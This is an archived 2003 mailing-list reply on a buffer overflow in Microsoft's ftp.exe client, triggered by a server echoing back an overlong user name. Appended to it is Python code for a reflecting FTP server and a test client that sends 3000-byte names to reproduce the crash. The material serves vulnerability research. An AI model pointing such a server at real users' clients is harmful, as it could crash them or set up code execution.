Vulnerability Development mailing list archives

Re: Buffer overflow in Microsoft ftp.exe


From: Frank Knobbe <fknobbe () knobbeits com>
Date: 14 May 2003 00:17:25 -0500

On Wed, 2003-04-30 at 03:34, aT4r InsaN3 wrote:
> There is a Buffer overflow in the raw quote command in the Microsoft Windows 
> XP ftp.exe
> 
> just type:
> 
> quote AAAAAAAAA....[517 chars]...AAAAAAAAAAAA
> ftp.exe will crash
> 
> after several checks i was unable to exploit this vulnerability remotely but 
> maybe there are other bugs in the way that ftp.exe manages the buffer of 
> server replies.


Yes, they are, or at least were. A couple of years ago we came across a
buffer overflow in the ftp client. If you use the ftp.exe client to log
into an FTP server with a user name >2048 or so, and the server is not a
Microsoft FTP server (used AIX in the test), the ftp client will crash
when the server echoes back the long user name.

(sorry, I'm pulling this from memory. I tossed my notes together with
Windows a couple years ago ;) 

For example:
C:> ftp test.host
220 test.host
Name: somethingprettylongbutnottoolonghere
331 user somethingprettylongbutnottoolonghere not found

C:> ftp test.host
Name: somethingverylong+A * 1024 or 2048
331 user somethingverylongAAAA...(up to buffer size, then a pop up
Window with the EIP error...)

If you enter an invalid user name, at some point the server is gonna
echo that user name back to the ftp client. If the user name is too
long, the long echo will overflow the ftp client. The reason this
doesn't work against a Microsoft FTP server is that the MS server will
truncate long user names to prevent buffer overflows. Too bad MS didn't
apply the same idea to the client. An FTP server that echoes back a long
user name can overflow the client. It was overwriting EIP, which means
that you could execute code, albeit in the context of the user executing
the ftp client.

Since we couldn't come up with a credible scenario to exploit this
remotely, we were short on time, and I myself was getting fed up with MS
security anyway, this issue was filed away and forgotten. But I'm sure
MS addressed this issue when they sent their programmers to security
boot camp, or at least when they started code reviews/audits....

Regards,
Frank
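A reproduction harness for the behaviour Frank describes, added here as an example and not part of the original thread: a minimal FTP server you control that reflects the USER argument into its 331 reply either in full (the non-Microsoft behaviour he saw on AIX) or clipped to a fixed length (what he says the MS server does), plus a raw client that drives one USER exchange so the reply can be inspected. The 2048-byte client buffer is his recollection, used here only as a model check on the reply length; the function names, the 127.0.0.1 binding and the sample user names are assumptions of this example.

```python
"""Tiny FTP server that echoes the USER argument back in its 331 reply.

Added example (not code from the thread): lets you stand up the kind of
server Frank describes and see exactly what the client receives.
"""
import socket
import socketserver
import threading

# Assumption: the client copies each reply line into a fixed 2048-byte
# buffer. This is Frank's recollection, not a verified ftp.exe figure.
CLIENT_REPLY_BUFFER = 2048


def reply_331(username, truncate_at=None):
    """Build the 331 line. truncate_at=None reflects the name in full (the AIX
    behaviour in the post); an integer clips it first, modelling a server that
    truncates long user names the way Frank says the MS server does."""
    if truncate_at is not None:
        username = username[:truncate_at]
    return "331 user %s not found\r\n" % username


def fits_client_buffer(reply_line, bufsize=CLIENT_REPLY_BUFFER):
    """Model check: does the reply leave room (incl. NUL) in a fixed buffer?"""
    return len(reply_line.encode("latin-1")) < bufsize


class EchoUserHandler(socketserver.StreamRequestHandler):
    """Speaks just enough FTP to accept USER and reflect its argument."""

    def handle(self):
        self.wfile.write(b"220 test.host\r\n")
        while True:
            line = self.rfile.readline()  # no length cap: the name comes back whole
            if not line:
                return
            cmd, _, arg = line.decode("latin-1").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                reply = reply_331(arg, self.server.truncate_at)
                self.wfile.write(reply.encode("latin-1"))
            elif cmd == "QUIT":
                self.wfile.write(b"221 Goodbye.\r\n")
                return
            else:
                self.wfile.write(b"530 Please login with USER and PASS.\r\n")


class EchoUserServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True

    def __init__(self, addr, truncate_at=None):
        super().__init__(addr, EchoUserHandler)
        self.truncate_at = truncate_at


def start_server(port=0, truncate_at=None):
    """Serve in a background thread; returns (server, bound_port).
    Use port=21 (needs privileges) to point a real ftp client at it."""
    srv = EchoUserServer(("127.0.0.1", port), truncate_at)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def login_attempt(port, username):
    """Raw client: read the banner, send USER, return the reply line."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        f = s.makefile("rwb")
        banner = f.readline()
        assert banner.startswith(b"220")
        f.write(b"USER " + username.encode("latin-1") + b"\r\n")
        f.flush()
        reply = f.readline().decode("latin-1")
        f.write(b"QUIT\r\n")
        f.flush()
        f.readline()  # consume 221 so the server side closes cleanly
        return reply


if __name__ == "__main__":
    srv, port = start_server()
    reply = login_attempt(port, "A" * 3000)
    print("reply length:", len(reply), "fits model buffer:", fits_client_buffer(reply))
    srv.shutdown()
    srv.server_close()
```

The handler reads the command line without a length limit and reflects the argument verbatim, which is the server behaviour Frank's test relied on; passing `truncate_at` to `start_server` gives the clipping variant, so you can compare what a reflecting and a truncating server hand the client for the same over-long name.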





